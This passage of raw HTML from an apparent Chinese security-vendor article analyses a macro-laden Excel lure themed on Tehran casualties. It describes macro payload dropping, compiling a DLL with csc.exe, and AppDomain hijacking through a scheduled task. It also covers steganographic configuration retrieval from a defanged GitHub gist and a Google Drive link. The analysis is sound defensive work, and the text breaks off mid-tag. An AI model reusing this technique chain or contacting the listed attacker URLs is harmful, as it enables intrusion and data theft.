&#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">年1月，对应的是公历2025年12月21日至2026年1月19日，推测可能是与2026年伊朗最新社会热点事件相关。</span><o:page></o:page></h2><p style="text-align: center;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.41755634638196915" data-w="1686" style="width: 526.11px;height: 219.67px;" src="https://wechat2rss.xlab.app/img-proxy/?k=f637e56b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKfjG4P5RUrWBCQZNhBqwZrticsTStlxE7YkfkouvNR6qg8iaGhYNJaE3fXMOXClV4PVib5SIRYwS52UDDygDfUia2aaP3f6BIeNKE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">一旦受害者打开该恶意文档，当启用宏之后，宏代码会依次获取名为“evil”，“p2”，“p3”的customXml对象。然后再将其Base64解码，依次得到C#源码，AppVStreamingUX.exe.config和fsvc.exe.config，并将C#源码释放到临时目录下。</span></p><p style="text-align: center;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.37658536585365854" data-w="1025" style="width: 494.26px;height: 186.14px;" src="https://wechat2rss.xlab.app/img-proxy/?k=98264f32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKpRfiaRoPXNqs3wUZ1EaKADrhgBl7libNLRyiaS8DibVBT3knFZu9DVjZnNwU3UpZZMRqce3onBiaxWiaD0PeHLGfMBMLFhj4PHW4Ik%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">接着优先将AppVStreamingUX.exe文件拷贝到“%LOCALAPPDATA%\WindowsMediaSync”，如果拷贝失败，则将“dfsvc.exe”文件拷贝到%LOCALAPPDATA%\WindowsMediaSync目录下。并将</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">AppVStreamingUX.exe.config，dfsvc.exe.config同步释放到</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">%LOCALAPPDATA%\WindowsMediaSync目录下，并使用csc.exe编译生成“AppVStreamingUX_Multi_User.dll”。</span><o:page></o:page></p><p style="text-align: center;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3863789615643965" data-w="1483" style="width: 512.32px;height: 197.94px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c783c4fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJMtHLwu3xugsfGVYBrcvMnNGjWPslvQ37LJ233hDNZgDqdqUAPK4tEGeQ8jJibQevjTXmoYP6JFrOXCA7j25L9UuwWzqc6rJM0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-align: center;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.19480519480519481" data-w="1848" style="width: 525.16px;height: 102.3px;" src="https://wechat2rss.xlab.app/img-proxy/?k=dedabf21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLxqqJH5A26g88Rkzspl640iaXL0kysJm68TdOia9bU9djhJ6bsLVicUfVicKDAvhRJqfOqLibQffILS8tZnCIPXADSFls8NDOUicHx0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">然后将内嵌的xml文件写入到task_def.xml文件中。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7295825771324864" data-w="1102" style="width: 493.79px;height: 360.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=85dc34d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLIMlrFSKPUfs8YeicHPUh3piaWfhKy3ick2PwYR15Z2v8wNHnHFwvURgQ8HTTN3MYPFq0uusxLk1wJR7GqED2JxLRibxCgDXtOreQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">最后创建计划任务，路径设置为拷贝的白文件路径，当白文件(AppVStreamingUX.exe或者dfsvc.exe)执行时，就会加载编译好的恶意AppVStreamingUX_Multi_User.dll文件。</span><o:page></o:page></p><p style="text-align: center;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.39316239316239315" data-w="936" style="width: 553.74px;height: 217.67px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4a83da95&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIQlp6hRsLh8UHU9cTZD0ias5j5Apnq1jyrTyhMPVFtcLyh15bOrjicvUeKZ8wKFiaXzQdKicFJYwQOdPLXf7V1J8NBlUxnjnyKUgk%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span><span style="font-size:16.0pt;line-height:173%;mso-bidi-font-size:16.0pt;font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;display:none;mso-hide:all;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;"><o:p><span leaf=""> 2.</span></o:p></span><span style="font-size:16.0pt;line-height:173%;mso-bidi-font-size:16.0pt;font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;display:none;mso-hide:all;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;"><o:p><span leaf=""> <span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">3.攻击组件分析</span></span></o:p></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="font-family: 黑体;font-variant: normal;text-transform: none;" data-pm-slice="1 1 [&#34;heading&#34;,{&#34;tagName&#34;:&#34;h2&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 16px;margin-top: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:2}]"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">3.攻击组件分析</span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">یست</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">نهایی</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">جانباختگان</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">دی</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_1404_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">تهران</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">بخش</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">دوم</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.xlsm”会将内嵌在恶意载荷中的C#源码释放到%TEMP%~[temp].cs。这是一个高度模块化的后门程序。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">当CLR创建AppDomain时，会自动触InitializeNewDomain()方法，从而启动线程ExecuteCoreLogic()。</span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">首先</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，会打开“%LocalAppData%\\Microsoft\\CLR_v4.0_32\\NativeImages\\ImageConfigFile8.Lock”文件，以保证单一实例。</span></p><p style="text-align:center;"><span style="text-indent: 28pt;font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf="" style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.46940559440559443" data-w="1144" style="width:466.219970703125px;height:218.8599853515625px;" src="https://wechat2rss.xlab.app/img-proxy/?k=03c4de8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKCKjIAq8ibCwI0zausXEV05JLCVic7m2SlBj4FS2PqfhRRkocnzeWhDUupNM8JnwVZLQvADMTWVSk5An8cPibrHlBeytzibtdqIto%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">获取当前进程的路径。如果出现异常，就实现重启。</span><o:page></o:page></p><p style="text-align:center;"><span style="text-indent: 2em;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.30738916256157633" data-w="1015" style="width:473.3499755859375px;height:145.49000549316406px;" src="https://wechat2rss.xlab.app/img-proxy/?k=508c04eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJ0E53MaT30TwKTpELRO8GWyUEcRE1AdLibh3ia5vas1ib4CDvTzh4u8DD5MXksEvbSLeg32MenPAFBTUuMkDKYFdKa7CpoE0Bpu4%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">接着获取远程的配置信息，主要通过下面四个步骤实现。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span style="font-family: 等线;font-variant: normal;text-transform: none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.388180764774044" data-w="863" style="width: 423.45px;height: 164.36px;" src="https://wechat2rss.xlab.app/img-proxy/?k=5d43bfeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIKUUUG0NUQicmfLdC56NZPBvIeFRAy3ms3cOGHnMxIV2OYNcZUmHpWarc4tUI1j5uZvDX5XbnJTZ5bySseRqfbmZl98RsXAvicE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第一步：获取“https[:]//gist.github.com/johnpeterson1304/d7bc6b1e29bfc64d237b1a7cbbc653b8”中“tamiManager.txt”文件的内容。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.728744939271255" data-w="988" style="width: 485.2px;height: 353.59px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7f2ff1ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLZ9CgDZyq7cgZzBcbNribLIkqCcMSibzewfsUZV67kW40zhuicOiafags90xJz9vJWGAc6QJWRUsnrqQCu9TZJB4tqn3Hl6DKcfK0%2F640%3Fwx_fmt%3Dpng"/></span><span leaf="" style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第二步：将“tamiManager.txt”的内容使用Base64解码，得到下一阶段的下载链接https[:]//drive.google.com/uc?export=download&amp;id=16tJgaxgsIl-F5l_ftyqItFo8SxpuaQPv，通过该链接可以下载一个名为“MIO9.png”图片</span><o:page></o:page></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.19653179190751446" data-w="1384" style="width:518.97998046875px;height:101.97001647949219px;" src="https://wechat2rss.xlab.app/img-proxy/?k=218ddd0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKeP1UIZlBOpvcm7d7JS1AkYyf5rFXwA5DOlKScW6Uu6OHhalp6qPTQOl4cVMIMDnGpZZz2GrpgT3AYHCWRshay92JfwJibbaxs%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第三</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 28.5pt;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">步</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">：攻击者使用图片隐写术，将配置信息嵌入到该图片中，然后使用特定LSB算法提取配置信息。</span></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.43812709030100333" data-w="1196" style="width:395.4100036621094px;height:173.239990234375px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7d9b498a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJ24v8SK1pU3WxJYjzqIYacOQ0hvFDFLLuRhqiauEJUsH5o9Qq78QuOgqIHJINU01RDRDGQiaEy34cQCicciaWc6mmibmSUJJzgPdBA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第四步：根据XORKey，依次使用Base64+XOR解密获取配置信息，并将配置信息进行填充，xor表示异或解密使用的Key，tel表示token，chat为chatId，m1-m5分别是下一阶段模块的下载地址，其余字段未使用。</span></p><p style="text-align: center;"><span style="text-indent: 2em;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5250447227191414" data-w="1118" style="width: 371.12px;height: 194.85px;" src="https://wechat2rss.xlab.app/img-proxy/?k=c1d71322&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKmfVuFoKo3JIicMGWDhlT0yVYiau4GFZgQict4gx9VyDw0QZZWN1aU5GP9icBiaOZpqgn5icLXWEpOHklA3m28R7RXFDs6Wly9hibrx8%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">最终获取的配置信息如下：</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5657370517928287" data-w="502" style="width: 502px;height: 284px;" 